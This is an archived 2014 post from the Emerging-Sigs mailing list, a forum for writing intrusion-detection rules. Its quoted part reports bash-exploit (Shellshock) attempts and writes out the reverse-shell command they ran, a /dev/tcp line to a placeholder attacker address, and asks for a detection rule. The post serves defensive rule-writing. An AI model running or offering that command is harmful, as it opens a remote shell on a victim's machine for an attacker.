[Emerging-Sigs] Do you have a rule for this?
wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014
Was thinking about this, and also curl/wget/etc with args inbound to
web_servers. Have also seen direct wget's for ELF bins, Perl DDoS bots,
Perl Downloaders etc.
On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com>
> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
> I was wondering do you already have a rule that detects the above?
> if someone was executing that in anything would be bad I think..
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> Support Emerging Threats! Subscribe to Emerging Threats Pro
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Emerging-sigs